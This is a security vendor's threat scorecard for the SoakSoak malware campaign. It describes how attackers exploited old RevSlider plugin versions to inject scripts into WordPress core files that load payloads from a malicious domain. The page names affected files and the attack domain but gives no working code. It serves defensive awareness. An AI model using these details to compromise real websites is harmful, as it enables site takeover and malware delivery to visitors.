SoakSoak
Threat Scorecard
EnigmaSoft Threat Scorecard
EnigmaSoft Threat Scorecards are assessment reports for different malware threats which have been collected and analyzed by our research team. EnigmaSoft Threat Scorecards evaluate and rank threats using several metrics including real-world and potential risk factors, trends, frequency, prevalence, and persistence. EnigmaSoft Threat Scorecards are updated regularly based on our research data and metrics and are useful for a wide range of computer users, from end users seeking solutions to remove malware from their systems to security experts analyzing threats.
EnigmaSoft Threat Scorecards display a variety of useful information, including:
Ranking: The ranking of a particular threat in EnigmaSoft’s Threat Database.
Severity Level: The determined severity level of an object, represented numerically, based on our risk modeling process and research, as explained in our Threat Assessment Criteria.
Infected Computers: The number of confirmed and suspected cases of a particular threat detected on infected computers as reported by SpyHunter.
See also Threat Assessment Criteria.
Ranking: | 16,775 |
Threat Level: | 80 % (High) |
Infected Computers: | 759 |
First Seen: | February 12, 2015 |
Last Seen: | June 19, 2023 |
OS(es) Affected: | Windows |
The SoakSoak infection has compromised more than 100,000 WordPress websites. SoakSoak first attracted attention after Google blacklisted more than 11,000 different domains that have been associated with a threat campaign linked to SoakSoak.ru. These attacks have impacted hundreds of thousands of websites using the WordPress platform. There is a relationship between SoakSoak and a vulnerability in the popular WordPress plug-in Revslider. This vulnerability was first uncovered a few months ago, making this increase in SoakSoak attacks a probable result of this exploit.
Table of Contents
How SoakSoak Attacks a Comnputer
The way in which SoakSoak attacks is by affecting a specific file in WordPress. This file is wp-includes/template-loader.php. To carry out its attacks, SoakSoak injects threatening code into the file. This allows a threatening script to be loaded into every Web page on the affected domain. This script loads a threatening Javascript file from the SoakSoak.ru domain, which may then be used to carry out various unwanted tasks on the infected computer. Using a security program and a strong Firewall can help prevent SoakSoak attacks and unauthorized scripts like these from loading.
The People Responsible for SoakSoak Attacks Have Updated Their Tactics
After Google had taken the step of blacklisting thousands of Web pages that had been affected by SoakSoak, the people behind SoakSoak reacted by using a different tactic in their attacks. The new wave of SoakSoak attacks now targets a different file as well, wp-includes/js/json2.min.js. The attack is similar; third parties modify this file so that it may load a threatening Flash file that carries out the SoakSoak attack. SoakSoak now includes an additional script from another threatening domain. Website administrators using the WordPress platform should take extra steps to ensure that their Web pages are protected from these types of threatening intrusions, paying special attention to plug-ins and ensuring that all software is always updated.
SoakSoak Attacks have been Associated with a Specific WordPress Plugin
To carry out attacks, third parties have targeted old versions of RevSlider. This is a popular WordPress plug-in that may be packaged and bundled into a WordPress theme. Versions prior to RevSlider 4.2 are being exploited by SoakSoak attacks. Discussions of the RevSlider vulnerability on underground sources had occurred several months ago. One issue with RevSlider is that this is a premium plugin that cannot be easily upgraded by all computer users. In many cases, RevSlider is packaged or bundled in a WordPress theme without the website owner's knowledge. These two characteristics have increased the distribution and potential risk of SoakSoak attacks. RevSlider's developers have silently patched this plug-in, although many websites have not been updated to include this new patch, making them still vulnerable to these attacks.
What are SoakSoak Attacks’ Goal
The main purpose of SoakSoak is to generate revenue at the expense of computer users. By distributing this threatening script, third parties may deliver threats to computers automatically. Third parties may profit from doing this utilizing various tactics. An adware infection could be installed to profit from advertising, or banking Trojans could be installed in order to gather victims' banking information. In many cases, the affected computer could be used as part of a botnet to carry out attacks or distribute additional threats or spam email messages. Computer users should keep all of their software fully up-to-date, especially Flash and Java, which are both involved in different variants of the SoakSoak attack. It is also highly recommended to use real-time protection while browsing the Web in order to prevent these types of threatening scripts from running on websites visited by computer users.
Submit Comment
Please DO NOT use this comment system for support or billing questions. For SpyHunter technical support requests, please contact our technical support team directly by opening a customer support ticket via your SpyHunter. For billing issues, please refer to our "Billing Questions or Problems?" page. For general inquiries (complaints, legal, press, marketing, copyright), visit our "Inquiries and Feedback" page.